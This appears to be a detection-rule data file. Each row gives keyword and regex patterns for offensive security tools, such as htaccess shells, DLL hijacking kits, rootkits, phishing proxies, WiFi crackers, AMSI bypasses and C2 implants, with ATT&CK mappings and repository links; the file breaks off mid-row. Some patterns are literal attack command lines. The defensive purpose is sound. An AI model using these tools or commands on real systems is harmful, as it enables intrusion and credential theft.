"*mod_buster.py*",".{0,1000}mod_buster\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52187" "*mod_caucho.shell.htaccess*",".{0,1000}mod_caucho\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - 
T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52188" "*mod_cgi.shell.bash.htaccess*",".{0,1000}mod_cgi\.shell\.bash\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","#linux","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52189" "*mod_cgi.shell.bind.htaccess*",".{0,1000}mod_cgi\.shell\.bind\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52190" "*mod_cgi.shell.windows.htaccess*",".{0,1000}mod_cgi\.shell\.windows\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52191" "*mod_mono.shell.htaccess*",".{0,1000}mod_mono\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52192" "*mod_multi.shell.htaccess*",".{0,1000}mod_multi\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess 
shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52193" "*mod_nikto.py*",".{0,1000}mod_nikto\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52194" "*mod_perl.embperl.shell.htaccess*",".{0,1000}mod_perl\.embperl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52195" "*mod_perl.IPP.shell.htaccess*",".{0,1000}mod_perl\.IPP\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52196" "*mod_perl.Mason.shell.htaccess*",".{0,1000}mod_perl\.Mason\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52197" "*mod_perl.shell.htaccess*",".{0,1000}mod_perl\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and 
attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52198" "*mod_php.shell.htaccess*",".{0,1000}mod_php\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52199" "*mod_php.shell2.htaccess*",".{0,1000}mod_php\.shell2\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52200" "*mod_php.stealth-shell.htaccess*",".{0,1000}mod_php\.stealth\-shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52201" "*mod_python.shell.htaccess*",".{0,1000}mod_python\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52202" "*mod_rivet.shell.htaccess*",".{0,1000}mod_rivet\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells 
and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52203" "*mod_ruby.shell.htaccess*",".{0,1000}mod_ruby\.shell\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52204" "*mod_sendmail.rce.htaccess*",".{0,1000}mod_sendmail\.rce\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","N/A","10","10","1048","193","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z","52205" "*mod_shellshock.py*",".{0,1000}mod_shellshock\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52206" "*mod_wp_enum.py*",".{0,1000}mod_wp_enum\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","52207" "*modDetective*",".{0,1000}modDetective.{0,1000}","offensive_tool_keyword","modDetective","modDetective is a small Python tool that chronologizes files based on modification time in order to investigate recent system activity. 
This can be used in red team engagements and CTFs in order to pinpoint where escalation and attack vectors may exist. This is especially true in CTFs. in which files associated with the challenges often have a much newer modification date than standard files that exist from install.","T1003 - T1036 - T1057","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/itsKindred/modDetective","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","52208" "*--mode 3 --type handshake --essid * --verbose -d dicts/* --read *.cap*",".{0,1000}\-\-mode\s3\s\-\-type\shandshake\s\-\-essid\s.{0,1000}\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.cap.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","52209" "*--mode 3 --type pmkid --verbose -d dicts/* --read *.txt*",".{0,1000}\-\-mode\s3\s\-\-type\spmkid\s\-\-verbose\s\-d\sdicts\/.{0,1000}\s\-\-read\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","0","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","52210" "*--mode com --acl --csv *",".{0,1000}\-\-mode\scom\s\-\-acl\s\-\-csv\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52211" "*--mode com --procmon *",".{0,1000}\-\-mode\scom\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52212" "*--mode dll --existing --pml *",".{0,1000}\-\-mode\sdll\s\-\-existing\s\-\-pml\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52213" "*--mode dll --procmon *",".{0,1000}\-\-mode\sdll\s\-\-procmon\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52214" "*--mode proxy --action prototypes --path 
*prototypes.csv*",".{0,1000}\-\-mode\sproxy\s\-\-action\sprototypes\s\-\-path\s.{0,1000}prototypes\.csv.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52215" "*--mode proxy --dll *.dll*--external-resources*",".{0,1000}\-\-mode\sproxy\s\-\-dll\s.{0,1000}\.dll.{0,1000}\-\-external\-resources.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52216" "*--mode proxy --ghidra *--dll *",".{0,1000}\-\-mode\sproxy\s\-\-ghidra\s.{0,1000}\-\-dll\s.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","52217" "*MODE=* REMOTE=*sshimpanzee*",".{0,1000}MODE\=.{0,1000}\sREMOTE\=.{0,1000}sshimpanzee.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","52218" "*ModHideDrv_x64.sys*",".{0,1000}ModHideDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - 
TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","52219" "*Modified by: Trevohack aka *SpaceShuttleIO*",".{0,1000}Modified\sby\:\sTrevohack\saka\s.{0,1000}SpaceShuttleIO.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","52220" "*Modified-Amsi-ScanBuffer-Patch*",".{0,1000}Modified\-Amsi\-ScanBuffer\-Patch.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","52221" "*ModifiedVulnerableBinaryFormatters\info.txt*",".{0,1000}ModifiedVulnerableBinaryFormatters\\info\.txt.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","52222" "*Modifiers\CharacterInsertion.psm1*",".{0,1000}Modifiers\\CharacterInsertion\.psm1.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - 
T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","52223" "*Modify the selected records of the Windows Event Viewer Log (EVT*",".{0,1000}Modify\sthe\sselected\srecords\sof\sthe\sWindows\sEvent\sViewer\sLog\s\(EVT.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#content","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","52224" "*Modify the TP_POOL linked list Flinks and Blinks to point to the malicious task*",".{0,1000}Modify\sthe\sTP_POOL\slinked\slist\sFlinks\sand\sBlinks\sto\spoint\sto\sthe\smalicious\stask.{0,1000}","offensive_tool_keyword","Thread-Pool-Injection-PoC","Proof of concept code for thread pool based process injection in Windows.","T1055.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/Uri3n/Thread-Pool-Injection-PoC","1","0","N/A","N/A","8","2","115","13","2025-03-29T23:14:47Z","2024-01-24T07:42:08Z","52225" "*Modifying JuciyPotato by Uknow to support webshell*",".{0,1000}Modifying\sJuciyPotato\sby\sUknow\sto\ssupport\swebshell.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#content","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","52226" "*Modlishka/config*",".{0,1000}Modlishka\/config.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. 
which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52227" "*MODLISHKA_BIN*",".{0,1000}MODLISHKA_BIN.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","0","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52228" "*Modlishka-linux-amd64*",".{0,1000}Modlishka\-linux\-amd64.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. 
without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","#linux","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52229" "*Modlishka-windows-*-amd64.exe*",".{0,1000}Modlishka\-windows\-.{0,1000}\-amd64\.exe.{0,1000}","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/drk1wi/Modlishka","1","1","N/A","network exploitation tool","5","10","4967","897","2024-04-19T12:23:00Z","2018-12-19T15:59:54Z","52230" "*module EvilProxy*",".{0,1000}module\sEvilProxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","52234" "*module powerup*",".{0,1000}module\spowerup.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","N/A","10","10","91","20","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z","52235" "*Module to generate shellcode out of raw metasploit shellcode 
file*",".{0,1000}Module\sto\sgenerate\sshellcode\sout\sof\sraw\smetasploit\sshellcode\sfile.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","Molerats","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","N/A","10","10","1392","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z","52236" "*MODULE_AUTHOR(""m0nad"")*",".{0,1000}MODULE_AUTHOR\(\""m0nad\""\).{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52237" "*MODULE_DESCRIPTION(""LKM rootkit""*",".{0,1000}MODULE_DESCRIPTION\(\""LKM\srootkit\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52238" "*MODULE_NAME ""diamorphine""*",".{0,1000}MODULE_NAME\s\""diamorphine\"".{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1986","451","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z","52239" "*modules*daclread.py*",".{0,1000}modules.{0,1000}daclread\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - 
TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","52240" "*modules.gtfobins import GTFOBins*",".{0,1000}modules\.gtfobins\simport\sGTFOBins.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","52241" "*modules.interesting_files import InterestingFiles*",".{0,1000}modules\.interesting_files\simport\sInterestingFiles.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","52242" "*modules.obfuscate_strings*",".{0,1000}modules\.obfuscate_strings.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52243" "*modules.uac_bypass*",".{0,1000}modules\.uac_bypass.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","52244" "*modules/enumrate.py*",".{0,1000}modules\/enumrate\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","52245" "*modules/exploits/*.js*",".{0,1000}modules\/exploits\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","52246" "*modules/exploits/*.rb*",".{0,1000}modules\/exploits\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","52247" "*modules/nemesis.rb*",".{0,1000}modules\/nemesis\.rb.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52248" "*Moedx765zilla\\Firedx765efox\\Profedx765iles*",".{0,1000}Moedx765zilla\\\\Firedx765efox\\\\Profedx765iles.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","52249" "*mojo.5688.8052.183894939787088877##*",".{0,1000}mojo\.5688\.8052\.183894939787088877\#\#.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 
